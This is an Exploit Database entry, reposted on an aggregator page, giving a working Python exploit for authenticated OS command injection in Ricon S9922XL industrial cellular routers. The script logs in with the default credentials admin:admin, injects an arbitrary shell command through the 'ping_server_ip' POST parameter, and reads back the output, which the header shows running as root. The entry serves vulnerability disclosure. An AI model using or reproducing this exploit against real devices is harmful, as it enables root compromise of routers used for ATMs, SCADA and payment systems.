Ricon Industrial Cellular Router S9922XL – Remote Command Execution (RCE)

• Exploit Database
• 23 阅读

• 作者： LiquidWorm
  日期： 2021-07-05
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50096/

• # Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) 
  # Date: 02.07.2021
  # Exploit Author: LiquidWorm
  # Vendor Homepage: https://www.riconmobile.com
  
  
  #!/usr/bin/env python3
  # -*- coding: utf-8 -*-
  #
  #
  # Ricon Industrial Cellular Router S9922XL Remote Command Execution
  #
  #
  # Vendor: Ricon Mobile Inc.
  # Product web page: https://www.riconmobile.com
  # Affected version: Model: S9922XL and S9922L
  # Firmware: 16.10.3
  #
  # Summary: S9922L series LTE router is designed and manufactured by
  # Ricon Mobile Inc., it based on 3G/LTE cellular network technology
  # with industrial class quality. With its embedded cellular module,
  # it widely used in multiple case like ATM connection, remote office
  # security connection, data collection, etc.
  #
  # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
  # and VPN technologies. Powerful 64-bit Processor and integrated real-time
  # operating system specially developed by Ricon Mobile. S9922XL is
  # widely used in many areas such as intelligent transportation, scada,
  # POS, industrial automation, telemetry, finance, environmental protection.
  #
  # Desc: The router suffers from an authenticated OS command injection
  # vulnerability. This can be exploited to inject and execute arbitrary
  # shell commands as the admin (root) user via the 'ping_server_ip' POST
  # parameter. Also vulnerable to Heartbleed.
  #
  # --------------------------------------------------------------------
  # C:\>python ricon.py 192.168.1.71 id
  # uid=0(admin) gid=0(admin)
  # --------------------------------------------------------------------
  #
  # Tested on: GNU/Linux 2.6.36 (mips)
  #WEB-ROUTER
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # @zeroscience
  #
  #
  # Advisory ID: ZSL-2021-5653
  # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
  #
  #
  # 02.07.2021
  #
  
  import requests,sys,re
  
  if len(sys.argv)<3:
  print("Ricon Industrial Routers RCE")
  print("Usage: ./ricon.py [ip] [cmd]")
  sys.exit(17)
  else:
  ipaddr=sys.argv[1]
  execmd=sys.argv[2]
  
  data={'submit_class':'admin',
  'submit_button' :'netTest',
  'submit_type' :'',
  'action':'Apply',
  'change_action' :'',
  'is_ping' :'0',
  'ping_server_ip':';'+execmd}
  
  htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
  htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
  reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
  print(reout)